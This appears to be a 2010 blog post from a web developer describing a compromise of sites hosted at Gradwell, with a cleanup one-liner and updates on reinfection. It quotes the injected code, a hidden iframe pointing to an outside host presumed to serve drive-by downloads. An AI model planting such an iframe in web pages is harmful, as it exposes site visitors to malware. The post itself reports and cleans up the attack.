I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.

A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.

The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.

Here's the code that is either prepended or appended to all .php and .html files:

<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>

I cleaned up the files as soon as I noticed the attack with this one-liner:

 find . -name '*.php' -or -name '*.html' | xargs -n1 perl -pi -e 
"s/\<iframe src\=\"http\:\/\/gaccess\.dynsite\.net\/blog\/wp-content\/0wn3d\/\" 
style\=\"display:none\"\>\<\/iframe\>//" 

(NB: this should all be on one line)

The files were re-infected an hour or so later. Re-infection seems to have stopped now.

The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.

I reported the breach to support and am awaiting the outcome.

Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.

There's a thread about this on uk.net.providers.gradwell

Peter Gradwell says:

there must be some sort of exploit in apache itself so we are also looking at that, 
and it's permissions model.

Update 2010-12-19 10:03

As Hoover says in the comments, Gradwell have been hacked again this morning.

Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22.

:-/